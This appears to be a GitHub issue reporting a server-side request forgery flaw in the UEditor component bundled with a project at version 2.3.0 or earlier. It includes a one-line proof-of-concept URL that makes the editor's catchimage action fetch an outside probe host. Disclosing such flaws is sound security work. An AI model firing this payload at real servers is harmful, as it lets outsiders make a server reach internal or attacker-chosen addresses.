Skip to content

SSRF vulnerability #44

@NinjaGPT

Description

@NinjaGPT

Summary

UEditor has an SSRF vulnerability, and this project is using the vulnerable version in <=2.3.0.

POC

http://127.0.0.1:8080/tianti-module-admin/ueditor/controller.jsp?action=catchimage&source%5b%5d=http://d46ee8bf07.ipv6.bypass.eu.org
Image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions